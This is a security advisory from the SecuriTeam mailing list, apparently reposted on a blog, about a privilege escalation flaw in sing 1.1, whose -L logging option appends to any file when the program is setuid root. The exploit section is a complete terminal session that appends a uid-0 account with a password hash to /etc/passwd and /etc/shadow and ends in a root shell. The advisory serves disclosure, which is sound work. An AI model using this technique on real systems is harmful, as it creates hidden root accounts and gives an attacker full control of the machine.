- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Sing Privileges Escalation
------------------------------------------------------------------------
SUMMARY
<http://sourceforge.net/projects/sing> sing is "a tool that sends ICMP
packets fully customized from command line". A vulnerability in the way
sing works allows local attackers who have access to a setuid root version
of sing to append to any file arbitrary data, which in turn allows them to
gain elevated privileges.
DETAILS
Vulnerable Systems:
* sing version 1.1
The sing program has the "-L" option to log its output into a log file.
Due to lack of file ownership checking, any file could be overwritten
(more precisely - appended) with its log output. By utilizing the -p
option in conjunction with the -L option it is possible for a local user
to gain elevated privileges.
Exploit:
Here is an example session:
gat3way@gat3way:~$ cat hah
hack:x:0:0:/tmp:/bin/sh
n
gat3way@gat3way:~$ cat hah1
hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::
n
gat3way@gat3way:~$ grep hack /etc/passwd
gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`"
SINGing to localhost (127.0.0.1): 78 data bytes
78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms
--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.073/0.073/0.073 ms
gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`"
SINGing to localhost (127.0.0.1): 43 data bytes
43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms
--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.083/0.083/0.083 ms
gat3way@gat3way:~$ grep hack /etc/passwd
hack:x:0:0:/tmp:/bin/sh
gat3way@gat3way:~$ ssh hack@localhost
hack@localhost's password:
.
root@gat3way:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gat3way:~#
ADDITIONAL INFORMATION
The information has been provided by <mailto:mrangelov@globul.bg> Milen
Rangelov.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
No comments:
Post a Comment